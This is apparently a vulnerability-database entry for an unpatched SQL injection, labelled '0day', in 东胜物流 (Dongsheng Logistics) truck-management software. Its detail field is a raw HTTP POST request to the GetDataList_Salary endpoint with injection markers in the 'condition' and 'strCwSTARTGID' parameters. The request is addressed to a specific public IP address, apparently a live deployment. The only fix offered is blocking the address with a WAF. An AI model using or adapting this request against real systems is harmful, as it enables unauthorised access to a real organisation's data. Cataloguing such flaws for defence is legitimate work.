vendor = "东胜物流"
name = "东胜物流 GetDataList_Salary SQL注入"
type = "SQL注入"
version = "未知"
path = "/TruckMng/MsWlDriver/GetDataList_Salary"
detail = "POST /TruckMng/MsWlDriver/GetDataList_Salary?_dc=1665626804091&start=0&limit=30&sort=&condition=1*&page=1 HTTP/1.1 Host: 119.167.103.22 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Length: 448 strCwSTARTGID=1'"
fix = "使用WAF封禁该地址"
date = "0707"
label = "0day"
verifier = "慧心一击"
